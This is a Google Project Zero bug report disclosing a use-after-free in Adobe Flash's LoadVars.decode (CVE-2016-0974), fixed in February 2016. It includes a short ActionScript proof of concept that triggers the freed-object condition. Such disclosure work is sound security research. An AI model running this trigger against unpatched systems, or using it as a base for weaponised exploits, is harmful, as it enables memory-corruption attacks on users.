667 - Adobe Flash: Use-after-free in LoadVars.decode - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Feb 2016
Cc:	project-...@google.com
Finder-natashenka Reported-2015-Dec-7 Deadline-90 CCProjectZeroMembers Product-Flash CVE-2016-0974 Severity-High Vendor-Adobe

Adobe Flash: Use-after-free in LoadVars.decode

Project Member Reported by natashenka@google.com, Dec 7 2015

Back to list

There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);


function func(){
	
	trace("here");
	tf.removeTextField();	
	return "test";

	}
	

A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

lv.swf
743 bytes Download

lv.fla
4.7 KB Download

Project Member Comment 1 by natashenka@google.com, Feb 17 2016

Labels: -Restrict-View-Commit CVE-2016-0974
Status: Fixed

Fixed in Feb update

► Sign in to add a comment